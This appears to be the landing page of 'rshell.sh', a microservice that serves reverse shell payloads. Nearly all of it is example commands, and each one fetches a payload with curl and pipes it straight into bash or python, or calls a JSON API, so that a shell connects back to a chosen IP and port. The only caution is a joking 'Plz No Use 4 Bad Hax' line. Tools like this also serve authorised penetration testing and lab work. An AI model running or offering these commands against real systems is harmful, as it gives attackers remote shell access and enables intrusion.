rshell.sh

Reverse Shell Payload Microservice


Examples

* Basic Usage:
curl rshell.sh/10.0.0.1/1234 | bash
* Different Languages:
curl rshell.sh/10.0.0.1/1234/?lang=python | python 
* Quote Wrapped:
curl rshell.sh/10.0.0.1/1234?quotes=single | xargs bash -c
* Web & Term Friendly Help Page:
curl rshell.sh/help
* JSON API:
curl -sd '{"host":"10.0.0.1", "port":1234, "lang":"python", "shell":"zsh"}' -H "Content-Type: application/json" -X POST  https://rshell.sh/api

Plz No Use 4 Bad Hax!!!


Project's Github
Comprehensive Payload List